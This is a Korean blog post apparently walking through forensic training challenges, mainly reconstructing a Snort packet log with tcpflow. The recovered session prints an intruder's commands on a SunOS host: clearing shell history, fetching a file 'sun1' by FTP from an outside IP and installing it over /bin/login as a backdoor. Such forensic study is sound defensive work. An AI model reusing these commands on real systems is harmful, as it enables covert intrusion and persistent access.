[93]    |    146740| 0|FUNC |GLOB |0    |UNDEF |time
[124] |    146944| 0|FUNC |GLOB |0    |UNDEF |toupper
[33]    | 0| 0|FILE |LOCL |0    |ABS    |values-Xa.c
#

# finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Question > a.out의 용도는 무엇입니까?
Answer > sniffer
Congratz! You made a success of challenge!

=====================================================
Question 22 - 네트워크 패킷 분석
=====================================================

$ cd /home1/user001
$ ls -al
total 192
drwxr-xr-x    2 user001 training 1536 Apr 22 14:13 .
drwxr-xr-x 108 root root 2048 Apr 17 17:49 ..
-rw-r--r--    1 user001 training    185 Apr 22 14:13 .profile
-rw-r--r--    1 root other    178544 Apr 22 14:13 0108@000-snort.log
-rw-r--r--    1 user001 training    124 Apr 22 14:13 local.cshrc
-rw-r--r--    1 user001 training    607 Apr 22 14:13 local.login
-rw-r--r--    1 user001 training    582 Apr 22 14:13 local.profile

$ /usr/local/bin/tcpflow -r 0108@000-snort.log
$ ls -al
total 314
drwxr-xr-x    2 user001 training 1536 Apr 22 14:13 .
drwxr-xr-x 108 root root 2048 Apr 17 17:49 ..
-rw-r--r--    1 user001 training    185 Apr 22 14:13 .profile
-rw-r--r--    1 root other    178544 Apr 22 14:13 0108@000-snort.log
-rw-r--r--    1 user001 training    89776 Apr 22 14:13 064.224.118.115.00020-17
2.016.001.102.33514
-rw-r--r--    1 user001 training    590 Apr 22 14:13 064.224.118.115.00021-17
2.016.001.102.33511
-rw-r--r--    1 user001 training 58 Apr 22 14:13 066.156.236.056.04065-17
2.016.001.102.00023
-rw-r--r--    1 user001 training 70 Apr 22 14:13 172.016.001.102.00021-19
5.174.097.101.01876
-rw-r--r--    1 user001 training 73 Apr 22 14:13 172.016.001.102.00023-06
6.156.236.056.04065
-rw-r--r--    1 user001 training    449 Apr 22 14:13 172.016.001.102.01524-20
8.061.001.160.03596
-rw-r--r--    1 user001 training 67 Apr 22 14:13 172.016.001.102.06112-20
8.061.001.160.03590
-rw-r--r--    1 user001 training 80 Apr 22 14:13 172.016.001.102.33511-06
4.224.118.115.00021
-rw-r--r--    1 user001 training 72 Apr 22 14:13 172.016.001.105.00021-19
5.174.097.101.01879
-rw-r--r--    1 user001 training 70 Apr 22 14:13 172.016.001.108.00021-19
5.174.097.101.01884
-rw-r--r--    1 user001 training 16 Apr 22 14:13 195.174.097.101.01876-17
2.016.001.102.00021
-rw-r--r--    1 user001 training 16 Apr 22 14:13 195.174.097.101.01879-17
2.016.001.105.00021
-rw-r--r--    1 user001 training 16 Apr 22 14:13 195.174.097.101.01884-17
2.016.001.108.00021
-rw-r--r--    1 user001 training 53 Apr 22 14:13 208.061.001.160.03590-17
2.016.001.102.06112
-rw-r--r--    1 user001 training 4178 Apr 22 14:13 208.061.001.160.03592-17
2.016.001.102.06112
-rw-r--r--    1 user001 training 4178 Apr 22 14:13 208.061.001.160.03593-17
2.016.001.102.06112
-rw-r--r--    1 user001 training 4178 Apr 22 14:13 208.061.001.160.03594-17
2.016.001.102.06112
-rw-r--r--    1 user001 training 4178 Apr 22 14:13 208.061.001.160.03595-17
2.016.001.102.06112
-rw-r--r--    1 user001 training    370 Apr 22 14:13 208.061.001.160.03596-17
2.016.001.102.01524
-rw-r--r--    1 user001 training    124 Apr 22 14:13 local.cshrc
-rw-r--r--    1 user001 training    607 Apr 22 14:13 local.login
-rw-r--r--    1 user001 training    582 Apr 22 14:13 local.profile
$

1524포트의 이름이 들어간 파일을 찾아보면,

$ ls *1524* -al
-rw-r--r-- 1 user001 training 449 Apr 22 14:13 172.016.001.102.01524-20
8.061.001.160.03596
-rw-r--r-- 1 user001 training 370 Apr 22 14:13 208.061.001.160.03596-17
2.016.001.102.01524
$

$ cat 172.016.001.102.01524-208.061.001.160.03596
# SunOS buzzy 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10
/core: No such file or directory
/var/dt/tmp/DTSPCD.log: No such file or directory
BD PID(s): 3476
# 8:47am up 11:24, 0 users, load average: 0.12, 0.04, 0.02
User tty login@ idle JCPU PCPU what
# # # mkdir: Failed to make directory "/usr/lib"; File exists
# # ftp: ioctl(TIOCGETP): Invalid argument
Password:
Name (64.224.118.115:root): # # ps_data
sun1
# # # $

# # # $ cat 208.061.001.160.03596-172.016.001.102.01524
uname -a;ls -l /core /var/dt/tmp/DTSPCD.log;PATH=/usr/local/bin:/usr/bin:/bin:/u
sr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;export PATH;echo "BD PID(s): "`ps -fed|g
rep ' -s /tmp/x'|grep -v grep|awk '{print $2}'`
w
unset HISTFILE
cd /tmp
mkdir /usr/lib
mv /bin/login /usr/lib/libfl.k
ftp 64.224.118.115
ftp
a@
cd pub
binary
get sun1
bye

ls
chmod 555 sun1
mv sun1 /bin/login
$

내용을 보면, ftp를 이용해 64.224.118.115로 접속해서 sun1이라는 파일을 받은 후,
해당 파일을 /bin/login에 덮어쓰는 것을 볼 수 있습니다.
즉 ftp 포트 (20) 번으로 넘어 온 파일이 sun1파일 즉 악성 파일일 것입니다.

$ ls *64.224.118.115*20* -al
-rw-r--r-- 1 user001 training 89776 Apr 22 14:13 064.224.118.115.00020-17
2.016.001.102.33514
$ cp 064.224.118.115.00020-172.016.001.102.33514 evidence

$ finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Question > 공격자가 다운로드한 파일 이름은?
Answer > s 1
Question > 공격자가 변조한 파일 이름은?
Answer > l n
Congratz! You made a success of challenge!

(0)

(0)

Posted by Dual

« 2012/05 »
Sun	Mon	Tue	Wed	Thu	Fri	Sat
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31

Trackbacks List

Tag Cloud

Notices

Archives

Categories